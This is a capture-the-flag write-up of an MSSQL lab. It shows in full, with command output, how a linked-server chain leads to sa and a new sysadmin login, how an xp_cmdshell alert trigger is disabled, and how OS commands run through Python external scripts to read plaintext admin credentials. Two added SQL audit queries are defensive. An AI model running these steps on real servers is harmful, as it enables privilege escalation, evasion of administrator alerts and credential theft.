20-Huh

https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server

➜  www impacket-mssqlclient 'external_user:#p00Public3xt3rnalUs3r#@10.13.38.11' -db POO_PUBLIC
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: POO_PUBLIC
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'POO_PUBLIC'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL (external_user  dbo@POO_PUBLIC)> 
                                                                   
SQL (external_user  dbo@POO_PUBLIC)> select @@version;             

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------                                                                                                                                                 
Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64)                                                                                                                          
        Jun 15 2019 00:26:19                                                                  
        Copyright (C) 2017 Microsoft Corporation                                              
        Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)                                                                                    
                                                                                              

SQL (external_user  dbo@POO_PUBLIC)> select user_name()                                       
                                                                                              
---                                                                                           
dbo                                                                                           

SQL (external_user  dbo@POO_PUBLIC)> SELECT name FROM master.dbo.sysdatabases;                                                                                                               
name                                                                                          
----------                                                                                    
master                                                                                        

tempdb                                                                                        

POO_PUBLIC                                                                                    

SQL (external_user  dbo@POO_PUBLIC)> use master                                               
[*] ENVCHANGE(DATABASE): Old Value: POO_PUBLIC, New Value: master                             
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.                                                                                                            
SQL (external_user  external_user@master)> SELECT * FROM  master.INFORMATION_SCHEMA.TABLES;                                                                                                  
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME         TABLE_TYPE                                  
-------------   ------------   ----------------   ----------                                  
master          dbo            spt_fallback_db    b'BASE TABLE'                               

master          dbo            spt_fallback_dev   b'BASE TABLE'                               

master          dbo            spt_fallback_usg   b'BASE TABLE'                               

master          dbo            spt_values         b'VIEW'                                     

master          dbo            spt_monitor        b'BASE TABLE'   

Nothing was useful.

Linked Servers
...

  1. If a link is enabled (dataaccess set to 1), every user on the database server can use the link regardless of the user's permissions (public, sysadmin, it doesn't matter).
  2. If the link is configured to use a SQL account, every connection is made with the privileges of that account (privileges on the link destination). In other words, a public user on server A can potentially execute SQL queries on server B as sysadmin.
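An audit query for exactly those two conditions, added here as an example and not part of the original notes or of HackTricks. It reads the catalog views behind sp_linkedservers and assumes the caller has VIEW ANY DEFINITION on the instance; a loopback link (data_source equal to the local server name) mapped to a fixed login is the shape seen on this box.

```sql
-- Added example (not from the original notes): list every linked server with
-- its login mapping and flag the combination the notes describe: data access
-- enabled plus a fixed remote login that every local login is mapped to.
SELECT  s.name                                   AS linked_server,
        s.data_source,
        s.is_data_access_enabled,                -- condition 1 ("dataaccess")
        s.is_rpc_out_enabled,                    -- needed for EXEC (...) AT
        CASE WHEN ll.local_principal_id = 0
             THEN '<all logins>'                 -- default mapping, covers public
             ELSE sp.name END                    AS local_login,
        ll.uses_self_credential,                 -- 1 = pass caller's context
        ll.remote_name,                          -- fixed remote account, if any
        CASE WHEN s.data_source = CONVERT(sysname, SERVERPROPERTY('ServerName'))
             THEN 1 ELSE 0 END                   AS is_loopback,
        CASE WHEN s.is_data_access_enabled = 1
              AND ll.local_principal_id = 0
              AND ll.uses_self_credential = 0
              AND ll.remote_name IS NOT NULL
             THEN 'REVIEW: every login reaches the remote side as '
                  + ll.remote_name                -- condition 2
             ELSE 'ok' END                       AS finding
FROM    sys.servers                 AS s
LEFT JOIN sys.linked_logins         AS ll ON ll.server_id   = s.server_id
LEFT JOIN sys.server_principals     AS sp ON sp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation for a flagged row is a mapping change, not a query: map the link to
-- the caller's own context (sp_addlinkedsrvlogin ... @useself = 'TRUE') or drop
-- the catch-all mapping, and disable data access where the link is not needed.
```
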
SQL (external_user  external_user@master)> EXEC sp_linkedservers
SRV_NAME                   SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE             SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
------------------------   ----------------   -----------   ------------------------   ------------------   ------------   -------   
COMPATIBILITY\POO_CONFIG   SQLNCLI            SQL Server    COMPATIBILITY\POO_CONFIG   NULL                 NULL           NULL      

COMPATIBILITY\POO_PUBLIC   SQLNCLI            SQL Server    COMPATIBILITY\POO_PUBLIC   NULL                 NULL           NULL      

I can execute commands as POO_CONFIG ->


SQL (external_user  external_user@master)> EXEC ('select @@version;') at [COMPATIBILITY\POO_CONFIG];
                                                                                                                                                                                                                                            
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
        Jun 15 2019 00:26:19 
        Copyright (C) 2017 Microsoft Corporation
        Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (external_user  external_user@master)> EXEC ('select user_name();') at [COMPATIBILITY\POO_CONFIG];
                
-------------   
internal_user   

I am an internal_user here.

Now as POO_CONFIG I'll try to run a command on POO_PUBLIC.

I am the sa user here ->

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
     
--   
sa   

I'll create a user with this ->

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('EXEC (''CREATE LOGIN ctflover WITH PASSWORD = ''''P@ssword123!'''';'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
SQL (external_user  dbo@POO_PUBLIC)> EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''ctflover'''', ''''sysadmin'''';'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
➜  www impacket-mssqlclient 'ctflover:P@ssword123!@10.13.38.11' -db POO_PUBLIC         
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: POO_PUBLIC
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'POO_PUBLIC'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL (ctflover  dbo@POO_PUBLIC)> EXEC sp_helpsrvrolemember 'sysadmin';
ServerRole   MemberName                                                                                 MemberSID   
----------   ------------------------------   -------------------------------------------------------------------   
sysadmin     sa                                                                                             b'01'   

sysadmin     COMPATIBILITY\Administrator              b'010500000000000515000000d5b47209a82f8f130194523bf4010000'   

sysadmin     NT SERVICE\SQLWriter             b'010600000000000550000000732b9753646ef90356745cb675c3aa6cd6b4d28b'   

sysadmin     NT SERVICE\Winmgmt               b'0106000000000005500000005a048ddff9c7430ab450d4e7477a2172ab4170f4'   

sysadmin     NT Service\MSSQL$POO_PUBLIC      b'010600000000000550000000dd5b12f3370561d12b86d8205c3047eb150c7820'   

sysadmin     NT SERVICE\SQLAgent$POO_PUBLIC   b'01060000000000055000000074cd7c77148ab9ab4233607e09cbd469b4c56cd6'   

sysadmin     ctflover                                                         b'3f2bff2421911d4da0f4533889ec5369'   

I am a sysadmin yeee.

Now I have another database I can access (flag db).

SQL (ctflover  dbo@POO_PUBLIC)> SELECT name FROM master.dbo.sysdatabases;
name         
----------   
master       

tempdb       

model        

msdb         

POO_PUBLIC   

flag         

SQL (ctflover  dbo@POO_PUBLIC)> use flag
[*] ENVCHANGE(DATABASE): Old Value: POO_PUBLIC, New Value: flag
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'flag'.
SQL (ctflover  dbo@flag)> SELECT * FROM flag.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
flag            dbo            flag         b'BASE TABLE'   

SQL (ctflover  dbo@flag)> select * from flag;
flag                                       
----------------------------------------   
b'POO{88d829eb3--SNIP--}'

Command Execution.
...

Unable to enable xp_cmdshell

SQL (ctflover  dbo@POO_PUBLIC)> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.
SQL (ctflover  dbo@POO_PUBLIC)> EXEC sp_configure 'show advanced options', 1;
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (ctflover  dbo@POO_PUBLIC)> RECONFIGURE;
SQL (ctflover  dbo@POO_PUBLIC)>  sp_configure 'xp_cmdshell', '1' 
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.

Removing trigger
...

A server-level trigger is a rule that stops a user from enabling xp_cmdshell. I am sa, so I can disable it. Server triggers are stored in sys.server_triggers.

SQL (ctflover  dbo@POO_PUBLIC)> select name from sys.server_triggers;
name
------------------------------   
ALERT_xp_cmdshell 
SQL (ctflover  dbo@POO_PUBLIC)> disable trigger ALERT_xp_cmdshell on all server
SQL (ctflover  dbo@POO_PUBLIC)> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL (ctflover  dbo@POO_PUBLIC)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$poo_public   

NULL         

Found a config file in webroot

SQL (ctflover  dbo@POO_PUBLIC)> xp_cmdshell dir C:\inetpub\wwwroot
output                                                  
-----------------------------------------------------   
 Volume in drive C has no label.                        

 Volume Serial Number is F661-7669                      

NULL                                                    

 Directory of C:\inetpub\wwwroot                        

03/17/2018  11:57 AM    <DIR>          Uploads          

--SNIP--

04/04/2018  11:24 AM               728 web.config       
03/17/2018  11:57 AM    <DIR>          Widgets          

               4 File(s)        111,385 bytes           

              15 Dir(s)  10,098,884,608 bytes free      

Did not work :(

SQL (ctflover  dbo@POO_PUBLIC)> xp_cmdshell type C:\inetpub\wwwroot\web.config
output              
-----------------   
Access is denied.   

NULL        

Hacktricks executing external scripts.

SQL (ctflover  dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
compatibility\poo_public01

This misconfiguration allows a user to execute commands as some other user; in our case it is compatibility\poo_public01, and luckily this user is able to read web.config.
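Every step above (the new sysadmin login, the disabled ALERT_xp_cmdshell trigger, xp_cmdshell and external scripts switched on) leaves a trace in the server catalog. The single review query below is an added example, not part of the original notes; it assumes VIEW SERVER STATE or sysadmin to read the configuration views. A DDL trigger is not a boundary against sysadmin, so its is_disabled flag is the thing to alert on rather than rely on.

```sql
-- Added example (not from the original notes): one result set with the three
-- things a DBA would review after this kind of activity.
SELECT  'server_trigger'                                   AS item,
        name,
        CASE WHEN is_disabled = 1 THEN 'DISABLED'
             ELSE 'enabled' END                            AS state,
        CONVERT(varchar(19), modify_date, 120)             AS date_info
FROM    sys.server_triggers                                -- e.g. ALERT_xp_cmdshell

UNION ALL
SELECT  'configuration',
        name,
        CASE WHEN CONVERT(int, value_in_use) = 1 THEN 'ON'
             ELSE 'off' END,
        NULL
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell',
                 'external scripts enabled',               -- sp_execute_external_script
                 'show advanced options',
                 'Ole Automation Procedures')

UNION ALL
SELECT  'sysadmin_member',
        p.name,
        p.type_desc,                                       -- SQL_LOGIN vs WINDOWS_LOGIN
        CONVERT(varchar(19), p.create_date, 120)           -- recently created? review it
FROM    sys.server_role_members       AS rm
JOIN    sys.server_principals         AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals         AS p ON p.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'

ORDER BY item, name;
```

Run from an account that is itself sysadmin, since a sysadmin attacker can edit the trigger and configuration; for tamper-evident records, mirror the same facts into an audit specification or a remote log collector.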

web.config->

SQL (ctflover  dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 

Express Edition will continue to be enforced.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <staticContent>
            <mimeMap
                fileExtension=".DS_Store"
                mimeType="application/octet-stream"
            />
        </staticContent>
        <!--
        <authentication mode="Forms">
            <forms name="login" loginUrl="/admin">
                <credentials passwordFormat = "Clear">
                    <user 
                        name="Administrator" 
                        password="EverybodyWantsToWorkAtP.O.O."
                    />
                </credentials>
            </forms>
        </authentication>
        -->
    </system.webServer>
</configuration>

We got credentials for the administrator on the /admin page.

flag->

➜  poo curl http://administrator:EverybodyWantsToWorkAtP.O.O.@10.13.38.11/admin/ 
"I can't go back to yesterday, because i was a different person then..."<br>
- Alice in Wonderland<br>
<br>
Flag : POO{4882bd2ccfd4b5318978540d9--SNIP--}